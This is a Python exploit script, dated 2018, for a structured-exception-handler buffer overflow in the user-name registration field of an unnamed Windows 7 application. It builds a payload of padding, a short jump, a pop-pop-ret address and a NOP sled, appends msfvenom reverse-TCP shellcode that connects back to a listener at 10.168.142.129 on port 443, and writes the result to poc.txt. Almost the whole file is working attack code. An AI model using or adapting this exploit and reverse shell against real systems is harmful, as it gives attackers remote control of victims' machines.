#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/05/27 10:59:49 dhn Exp $
#
# Tested with Windows 7 SP1 (x86)
# Steps:
#  - Click on Register
#  - Paste "poc.txt"content in "Enter User Name" field

class Exploit:

    def __init__(self, shellcode):
        self._shellcode = shellcode 
        self._payload = None

    def __write(self):
        f = open("poc.txt", "w")
        f.write(self._payload)
        f.close()

    def run(self):
        pattern = "A" * 1008
        nseh = "\xeb\x0b\x90\x90"
        pop2ret = "\x59\x78\x03\x10"

        self._payload = pattern
        self._payload += nseh
        self._payload += pop2ret
        self._payload += "\x90" * 32
        self._payload += self._shellcode

        self.__write()

def main():
    #msfvenom --platform windows -p windows/shell_reverse_tcp \
    #        LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" -f py
    shellcode = (
         "\xdb\xd7\xb8\xc2\xf2\x0e\x74\xd9\x74\x24\xf4\x5f\x31"
         "\xc9\xb1\x52\x31\x47\x17\x03\x47\x17\x83\x2d\x0e\xec"
         "\x81\x4d\x07\x73\x69\xad\xd8\x14\xe3\x48\xe9\x14\x97"
         "\x19\x5a\xa5\xd3\x4f\x57\x4e\xb1\x7b\xec\x22\x1e\x8c"
         "\x45\x88\x78\xa3\x56\xa1\xb9\xa2\xd4\xb8\xed\x04\xe4"
         "\x72\xe0\x45\x21\x6e\x09\x17\xfa\xe4\xbc\x87\x8f\xb1"
         "\x7c\x2c\xc3\x54\x05\xd1\x94\x57\x24\x44\xae\x01\xe6"
         "\x67\x63\x3a\xaf\x7f\x60\x07\x79\xf4\x52\xf3\x78\xdc"
         "\xaa\xfc\xd7\x21\x03\x0f\x29\x66\xa4\xf0\x5c\x9e\xd6"
         "\x8d\x66\x65\xa4\x49\xe2\x7d\x0e\x19\x54\x59\xae\xce"
         "\x03\x2a\xbc\xbb\x40\x74\xa1\x3a\x84\x0f\xdd\xb7\x2b"
         "\xdf\x57\x83\x0f\xfb\x3c\x57\x31\x5a\x99\x36\x4e\xbc"
         "\x42\xe6\xea\xb7\x6f\xf3\x86\x9a\xe7\x30\xab\x24\xf8"
         "\x5e\xbc\x57\xca\xc1\x16\xff\x66\x89\xb0\xf8\x89\xa0"
         "\x05\x96\x77\x4b\x76\xbf\xb3\x1f\x26\xd7\x12\x20\xad"
         "\x27\x9a\xf5\x62\x77\x34\xa6\xc2\x27\xf4\x16\xab\x2d"
         "\xfb\x49\xcb\x4e\xd1\xe1\x66\xb5\xb2\x07\xdf\x3b\xc3"
         "\x70\x1d\x43\xc5\x3b\xa8\xa5\xaf\x2b\xfd\x7e\x58\xd5"
         "\xa4\xf4\xf9\x1a\x73\x71\x39\x90\x70\x86\xf4\x51\xfc"
         "\x94\x61\x92\x4b\xc6\x24\xad\x61\x6e\xaa\x3c\xee\x6e"
         "\xa5\x5c\xb9\x39\xe2\x93\xb0\xaf\x1e\x8d\x6a\xcd\xe2"
         "\x4b\x54\x55\x39\xa8\x5b\x54\xcc\x94\x7f\x46\x08\x14"
         "\xc4\x32\xc4\x43\x92\xec\xa2\x3d\x54\x46\x7d\x91\x3e"
         "\x0e\xf8\xd9\x80\x48\x05\x34\x77\xb4\xb4\xe1\xce\xcb"
         "\x79\x66\xc7\xb4\x67\x16\x28\x6f\x2c\x26\x63\x2d\x05"
         "\xaf\x2a\xa4\x17\xb2\xcc\x13\x5b\xcb\x4e\x91\x24\x28"
         "\x4e\xd0\x21\x74\xc8\x09\x58\xe5\xbd\x2d\xcf\x06\x94"
    )

    exploit = Exploit(shellcode)
    exploit.run()


if __name__ == "__main__":
    main()
